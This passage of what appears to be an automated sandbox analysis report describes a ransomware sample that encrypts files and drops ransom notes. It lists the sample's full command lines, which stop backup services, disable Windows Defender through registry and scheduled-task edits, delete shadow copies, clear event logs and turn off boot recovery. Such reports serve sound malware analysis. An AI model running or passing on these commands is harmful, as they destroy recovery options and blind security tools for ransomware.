| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\10909_24x24x32.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-60.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\rFSH_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_pl.jar.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_FgAAABYAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\resources.pri | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-16.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\caution.svg.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-ui.jar.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_GAAAABgAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\mask\mask_corners_queen.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Lumia.VideoTk\CreateMaskPS_BGRA.cso | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\PhotosApp\Assets\ThirdPartyNotices\ThirdPartyNotices.html | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-96.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\WideTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\selector.js.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AgAAAAIAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe\Assets\contrast-black\SmallLogo.scale-200_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionWideTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\rw_16x11.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\ui-strings.js.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-loaders.jar.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019VL_KMS_Client_AE-ppd.xrm-ms.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\dk_16x11.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-100_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\5511_48x48x32.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailLargeTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MEDIA\CASHREG.WAV.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_JAAAACQAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageWideTile.scale-200_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-72_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugin.js.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_CgAAAAoAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ro-ro\ui-strings.js.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_JAAAACQAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\FPA_f2\FA000000002.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_CgAAAAoAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe\Assets\Images\Tiles\Square71x71Logo.scale-200.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-black_targetsize-80.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_forward_18.svg.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_GgAAABoAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\POWERPNT_COL.HXT.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_PAAAADwAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\animations\OneNoteFRE_CreateNotes_RTL_Tablet.mp4 | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemeCreation\None.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Home.aapp.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\InsiderHubLargeTile.scale-200_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\MapsAppList.targetsize-30.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\rFSH_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_12d5a" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_12d5a" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_12d5a" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
